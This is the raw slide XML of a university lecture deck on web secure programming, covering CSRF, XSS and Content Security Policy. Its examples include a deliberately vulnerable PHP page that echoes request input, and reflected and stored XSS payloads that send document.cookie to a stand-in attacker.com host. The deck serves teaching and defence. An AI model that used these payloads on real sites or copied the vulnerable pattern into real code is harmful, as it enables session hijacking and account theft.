                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;/button&gt;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should be written for example as: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</a:rPr>
              <a:t>&lt;button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class = “buy”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="3366FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> Buy </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="3366FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;/button&gt;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$(‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>button.buy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>’).bind(“click”, function(){ … } )</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr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</a:rPr>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3366FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>button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id </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>= “buy”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3366FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Buy </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3366FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;/button&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>document.getElementById</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="008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“buy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>”).</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>addEventListener</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>("click", </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>function</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>{}</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>);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4077072"/>
            <a:ext cx="9144000" cy="923330"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg2">
              <a:lumMod val="60000"/>
              <a:lumOff val="4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       								        </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0" smtClean="0"/>
              <a:t>JQUERY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-252536" y="5661248"/>
            <a:ext cx="9577064" cy="923330"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg2">
              <a:lumMod val="60000"/>
              <a:lumOff val="4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812360" y="6237312"/>
            <a:ext cx="116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DOM API</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR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in 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default-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>src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script-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>src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style-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>src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img-src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frame-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>src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*</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>‘none’</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>‘self’</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>‘unsafe-inline’</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>‘unsafe-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>eval</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>’</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr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XSS Vulnerable code  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52578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dirty="0" smtClean="0"/>
              <a:t>Adding</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>HTTP header: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="60000"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="60000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Server-side implementation of  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>search.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:spcBef>
                <a:spcPts val="1799"/>
              </a:spcBef>
              <a:buNone/>
            </a:pP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&lt;HTML&gt;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&lt;BODY&gt;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Results for &lt;?</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>php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 echo $_GET[term] ?&gt; :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. . .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&lt;/BODY&gt;   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0" y="2097136"/>
            <a:ext cx="9144000" cy="611784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100" marR="0" lvl="0" indent="-342100" algn="l" defTabSz="91464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Content-Security-Policy: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script-src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74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‘self’ trusted.com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6743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Reflected XSS attack on example 1</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US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sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="31462" y="1346929"/>
            <a:ext cx="9112538" cy="4874186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dirty="0" smtClean="0">
              <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
              <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="267435"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://victim.com/search.php ? term=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0" smtClean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&lt;script&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0" err="1" smtClean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window.location</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0" smtClean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 = “http://attacker.com?cookie=” + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0" err="1" smtClean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document.cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0" smtClean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; &lt;/script&gt;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None/>
            </a:pP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None/>
            </a:pP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what’s the consequence of this attack?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0" y="3429000"/>
            <a:ext cx="9144000" cy="611784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100" marR="0" lvl="0" indent="-342100" algn="l" defTabSz="91464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Content-Security-Policy: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script-src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74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‘self’ trusted.com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6743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XSS Vulnerable app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8128000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 bwMode="auto">
          <a:xfrm>
            <a:off x="251521" y="3068960"/>
            <a:ext cx="1656184" cy="86409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835696" y="3789040"/>
            <a:ext cx="1224136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203849" y="4293097"/>
            <a:ext cx="4104456" cy="64633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dirty="0" smtClean="0"/>
              <a:t>old messages stored in database in the server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835696" y="2780928"/>
            <a:ext cx="129614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707905" y="2924945"/>
            <a:ext cx="3096344" cy="64633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dirty="0" smtClean="0"/>
              <a:t>user can leave a new message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Stored XSS attack on example 2</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US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sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="31462" y="1346929"/>
            <a:ext cx="9112538" cy="487418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Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Attacker leaves a message like this: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&lt;script&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0" err="1" smtClean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window.location</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0" smtClean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 = “http://attacker.com?cookie=” + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0" err="1" smtClean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document.cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0" smtClean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; &lt;/script&gt; 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0" y="3249264"/>
            <a:ext cx="9144000" cy="611784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100" marR="0" lvl="0" indent="-342100" algn="l" defTabSz="91464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Content-Security-Policy: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script-src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74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‘self’ trusted.com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6743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4941168"/>
            <a:ext cx="5982728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100" lvl="0" indent="-342100" defTabSz="914649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9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what’s the consequence of this attack?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XSRF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 smtClean="0"/>
              <a:t>Owasp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> A8: Cross Site Request Forgery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269" y="889000"/>
            <a:ext cx="9939853" cy="621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SOP and XSS?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When SOP applies, attacker’s script cannot access resources of trusted site (but we have already seen SOP bypass by permissive navigation policies) , so code can be injected but executed in isolation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functionality, programmers decide to include external scripts using &lt;script&gt; and SOP does not apply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CSRF and XSS?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These two attacks are sometimes confused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XSS: executes attacker code in browser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CSRF: give unauthorized capabilities to attacker in server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1531" y="68856"/>
            <a:ext cx="7550879" cy="1775972"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Cross site request forgery </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>CSRF or XSRF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Transmits </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>unauthorized commands </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>from a user who has rightfully logged in to a website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Attack to GMail : January 2007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sz="2000" dirty="0" smtClean="0"/>
              <a:t>Google  didn’t check what page requested your contact list. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just" eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="just" eaLnBrk="1" hangingPunct="1">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" smtClean="0"/>
              <a:t>Hypothesis:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t> you are logged in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>gmail</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t> and have opened attacker.com site. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just" eaLnBrk="1" hangingPunct="1">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" smtClean="0"/>
              <a:t>Attack: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>The page from attacker.com requests you contact list from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>google</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t> server.  Since you are logged in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>google</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>, your cookie is sent along the request and the request goes through. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just" eaLnBrk="1" hangingPunct="1">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" smtClean="0"/>
              <a:t>Consequence:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t> Attacker gets your contact list.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="50180" name="Picture 6" descr="Gmail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5317124"/>
            <a:ext cx="2957990" cy="106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710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 bwMode="auto">
          <a:xfrm>
            <a:off x="2123728" y="1052738"/>
            <a:ext cx="864096" cy="4320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19672" y="6453336"/>
            <a:ext cx="1152128" cy="4320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Prevention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Server side:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> add a secret that the attacker cannot guess</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> re-authenticate for critical operations</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>User side:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>logging off one site before using others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Prevention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Server side:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t> add a secret that the attacker cannot guess</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t> re-authenticate for critical operations</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>User side:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>logging off one site before using others</a:t>
            </a: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614941" y="6096318"/>
            <a:ext cx="8108614" cy="36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451" tIns="41225" rIns="82451" bIns="41225">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Question: could it have worked setting a cookie with the random number?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orldwide design template">
  <a:themeElements>
    <a:clrScheme name="Office Them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2065</Words>
  <Application>Microsoft Macintosh PowerPoint</Application>
  <PresentationFormat>Présentation à l'écran (4:3)</PresentationFormat>
  <Paragraphs>328</Paragraphs>
  <Slides>42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3" baseType="lpstr">
      <vt:lpstr>Worldwide design template</vt:lpstr>
      <vt:lpstr>Web Secure Programming</vt:lpstr>
      <vt:lpstr>Course material </vt:lpstr>
      <vt:lpstr>Agenda</vt:lpstr>
      <vt:lpstr>XSRF</vt:lpstr>
      <vt:lpstr>Cross site request forgery  CSRF or XSRF</vt:lpstr>
      <vt:lpstr>Attack to GMail : January 2007</vt:lpstr>
      <vt:lpstr>Présentation PowerPoint</vt:lpstr>
      <vt:lpstr>Prevention</vt:lpstr>
      <vt:lpstr>Prevention</vt:lpstr>
      <vt:lpstr>What about SOP and CSRF?</vt:lpstr>
      <vt:lpstr>What about SOP and CSRF?</vt:lpstr>
      <vt:lpstr>XSS</vt:lpstr>
      <vt:lpstr>Code injection</vt:lpstr>
      <vt:lpstr>Code injection</vt:lpstr>
      <vt:lpstr>What is XSS?</vt:lpstr>
      <vt:lpstr>Présentation PowerPoint</vt:lpstr>
      <vt:lpstr>Example 1: XSS Vulnerable code  </vt:lpstr>
      <vt:lpstr>Reflected XSS attack on example 1</vt:lpstr>
      <vt:lpstr>Example 2: XSS Vulnerable code  </vt:lpstr>
      <vt:lpstr>Stored XSS attack on example 2</vt:lpstr>
      <vt:lpstr>Stored XSS - Example</vt:lpstr>
      <vt:lpstr>MySpace.com   (Samy worm)</vt:lpstr>
      <vt:lpstr>Notable XSS exploits</vt:lpstr>
      <vt:lpstr>Stored XSS using images</vt:lpstr>
      <vt:lpstr>Input data validation and filtering</vt:lpstr>
      <vt:lpstr>Output filtering / encoding</vt:lpstr>
      <vt:lpstr>Common encoding functions</vt:lpstr>
      <vt:lpstr>Existing Server-side Prevention</vt:lpstr>
      <vt:lpstr>Defenses - Prevention</vt:lpstr>
      <vt:lpstr>Content Security Policy (CSP) </vt:lpstr>
      <vt:lpstr>CSP Example</vt:lpstr>
      <vt:lpstr>CSP Example inlined script</vt:lpstr>
      <vt:lpstr>Inline event handlers are inline scripts</vt:lpstr>
      <vt:lpstr>Directives in CSP</vt:lpstr>
      <vt:lpstr>Source Values</vt:lpstr>
      <vt:lpstr>Recall XSS Vulnerable code  </vt:lpstr>
      <vt:lpstr>Reflected XSS attack on example 1</vt:lpstr>
      <vt:lpstr>Recall XSS Vulnerable app  </vt:lpstr>
      <vt:lpstr>Stored XSS attack on example 2</vt:lpstr>
      <vt:lpstr>Présentation PowerPoint</vt:lpstr>
      <vt:lpstr>What about SOP and XSS?</vt:lpstr>
      <vt:lpstr>What about CSRF and XSS?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trezk</dc:creator>
  <cp:lastModifiedBy>Tamara Rezk</cp:lastModifiedBy>
  <cp:revision>35</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2015-10-01T08:31:48Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2015-10-03T11:28:52Z</dcterms:modified>
</cp:coreProperties>
</file>